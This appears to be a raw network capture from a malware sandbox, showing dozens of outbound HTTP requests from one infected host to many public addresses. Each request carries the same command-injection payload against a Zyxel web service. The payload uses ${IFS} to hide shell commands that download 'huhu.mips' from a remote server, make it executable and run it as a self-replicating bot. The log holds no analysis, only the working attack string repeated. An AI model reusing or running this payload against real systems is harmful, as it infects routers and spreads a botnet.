                                            Feb 2, 2024 06:21:08.548758984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3301192.168.2.153877285.124.189.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548784018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3302192.168.2.154665699.112.184.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548809052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3303192.168.2.15342505.129.49.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548870087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3304192.168.2.1557048176.162.43.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548896074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3305192.168.2.154619258.129.43.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548934937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3306192.168.2.1536806179.49.168.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.548964024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3307192.168.2.155675448.54.232.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549014091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3308192.168.2.153524414.123.75.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549056053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3309192.168.2.1554662186.107.74.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549093962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3310192.168.2.1546242158.108.198.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549119949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3311192.168.2.1546588157.38.21.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549171925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3312192.168.2.156015025.38.238.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549217939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3313192.168.2.1542026110.210.74.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549238920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3314192.168.2.154788276.168.160.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549276114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3315192.168.2.156053476.20.39.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549336910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3316192.168.2.1549916148.193.127.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549369097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3317192.168.2.1554066113.248.164.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549396992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3318192.168.2.1541148172.210.139.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549477100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3319192.168.2.1550642144.43.18.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549494028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3320192.168.2.1543002122.32.176.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549541950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3321192.168.2.1543160181.139.37.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549573898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3322192.168.2.1542526163.29.127.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549633980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3323192.168.2.154134279.199.76.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549659014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3324192.168.2.1558582190.156.31.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549732924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3325192.168.2.1533910173.186.231.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549760103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3326192.168.2.1541570168.251.8.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549782038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3327192.168.2.154267227.236.129.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549839973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3328192.168.2.1545468210.170.40.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549892902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3329192.168.2.153894642.117.98.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549918890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3330192.168.2.1539440149.139.182.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549937963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3331192.168.2.1537854165.104.145.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.549988031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3332192.168.2.154800636.204.235.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550029993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3333192.168.2.1547500123.172.152.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550040960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3334192.168.2.155608832.94.99.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550090075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3335192.168.2.153525464.226.168.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550117016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3336192.168.2.1554350133.149.148.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550162077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3337192.168.2.154732275.93.106.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550224066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3338192.168.2.154083670.13.38.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550257921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3339192.168.2.153428469.154.157.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550295115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3340192.168.2.154465475.61.165.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550340891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3341192.168.2.1535548200.101.153.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550390959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3342192.168.2.1560858150.209.54.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550421953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3343192.168.2.1560524103.64.209.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550487995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3344192.168.2.1552576176.157.254.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550499916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3345192.168.2.155534883.164.34.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550544977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3346192.168.2.155292273.181.156.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550605059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3347192.168.2.155570678.83.91.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550635099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3348192.168.2.154516220.1.47.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550677061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3349192.168.2.1533190194.9.110.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550728083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3350192.168.2.1557032167.84.90.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550766945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3351192.168.2.155479085.59.39.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550813913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3352192.168.2.1539842217.5.104.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550858974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3353192.168.2.1541610216.220.52.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550914049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3354192.168.2.1542466120.61.67.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550944090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3355192.168.2.1551530222.230.211.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.550991058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3356192.168.2.1551758139.46.48.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551022053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3357192.168.2.1545568136.5.248.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551057100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3358192.168.2.155352266.61.59.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551089048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3359192.168.2.1555340198.116.211.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551126003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3360192.168.2.1555800120.159.163.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551163912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3361192.168.2.1540674212.119.209.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551192999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3362192.168.2.155212276.90.102.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551239014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3363192.168.2.155251619.127.106.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551270962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3364192.168.2.1545286209.126.139.88443
                                            TimestampBytes transferredDirectionData
